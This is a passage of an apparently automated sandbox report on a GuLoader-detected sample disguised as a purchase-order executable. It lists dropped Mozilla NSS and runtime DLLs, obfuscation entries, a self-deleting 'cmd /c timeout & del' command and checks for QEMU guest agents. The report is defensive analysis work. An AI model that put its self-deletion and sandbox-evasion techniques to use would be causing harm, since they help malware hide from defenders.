Source:	Binary string: qipcap.pdb0 source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, qipcap.dll.1.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7185437486.000000001DCC0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7185063204.000000001DCE8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7213087314.000000001DB58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.5.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147239448.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7147080304.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
Source:	Binary string: vcruntime140.i386.pdb source: PO No. 3200005919.exe, 00000005.00000003.7191720901.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7216382572.000000001DC98000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.5.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7162088614.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199061062.000000001D924000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7199694393.000000001D928000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7168388100.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196318925.000000001E658000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195985940.000000001E64C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196442274.000000001E65C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196171931.000000001E654000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
Source:	Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: PO No. 3200005919.exe, 00000005.00000003.7208087648.000000001DA10000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7201261462.000000001D9D0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183429342.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7183128266.000000001DCC8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7211428448.000000001DB40000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.5.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: PO No. 3200005919.exe, 00000005.00000003.7207591372.000000001D9A8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174962411.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7174178046.000000001D3C4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7270679422.000000001DE20000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.5.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7195041195.000000001E63C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194158681.000000001E634000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195525464.000000001E644000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7194634564.000000001E638000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193638820.000000001E630000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195289045.000000001E640000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7195774303.000000001E648000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7152463127.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
Source:	Binary string: D:\Kelly1076\__HITDisplay__\00_Code\ProArt Code_Git\ProArt\x64\Release\WMIMethod.pdb source: PO No. 3200005919.exe, 00000001.00000002.7112633568.000000000040A000.00000004.00000001.01000000.00000003.sdmp, PO No. 3200005919.exe, 00000001.00000002.7114872753.000000000289B000.00000004.00000800.00020000.00000000.sdmp, WMIMethod.dll.1.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192792717.000000001E604000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192477101.000000001E5F8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141392781.000000001DCB8000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192708827.000000001E600000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192605806.000000001E5FC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7141563170.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192063322.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192298891.000000001E5F4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7197871193.000000001E6B0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197668078.000000001E69C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197360510.000000001E698000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7193344870.000000001E61C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7145338066.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7192860880.000000001E610000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193081967.000000001E614000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7193218179.000000001E618000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7196731869.000000001E670000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7159539905.000000001DCB0000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7160196459.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197102801.000000001E67C000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7196892223.000000001E674000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7197003158.000000001E678000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: PO No. 3200005919.exe, 00000005.00000003.7166478515.000000001DCBC000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7198074012.000000001D920000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000002.7268762679.000000001DD58000.00000004.00001000.00020000.00000000.sdmp, PO No. 3200005919.exe, 00000005.00000003.7165324032.000000001DCB4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000001.00000002.7116762893.0000000004120000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.6901415186.0000000001660000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_10002DE0 push eax; ret	1_2_10002E0E
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041264D4 push 0000001Bh; retf	1_2_041264E8
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04129508 pushad ; ret	1_2_04129509
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041235B8 push ebp; iretd	1_2_041235C2
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04122694 push FFFFFFA5h; iretd	1_2_041226D8
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412478E push EB0001E7h; ret	1_2_04124793
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04122FD1 pushad ; ret	1_2_04122FD7
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04122171 push edx; iretd	1_2_0412225F
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04122235 push edx; iretd	1_2_0412225F
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412631B push ss; iretd	1_2_0412631D
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_0412635C push esp; ret	1_2_04126373
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_04123BAE push cs; retf	1_2_04123C32
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Code function: 1_2_041233D9 pushfd ; ret	1_2_041233E5

Source: WMIMethod.dll.1.dr	Static PE information: section name: _RDATA
Source: qipcap.dll.1.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.5.dr	Static PE information: section name: .didat

Source: api-ms-win-core-console-l1-1-0.dll.5.dr

Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\softokn3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\ucrtbase.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\nsh409.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\qipcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\Overfurnished\Tuberculisation\Woodwose\Circularizations126\Iltningernes\Mellivorous\WMIMethod.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File created: C:\Users\user\AppData\Local\Temp\94EA6FBC\freebl3.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process created: C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "PO No. 3200005919.exe			Jump to behavior

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect Any.run

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe	Jump to behavior
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	File opened: C:\Program Files\qga\qga.exe	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\PO No. 3200005919.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\94EA6FBC\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
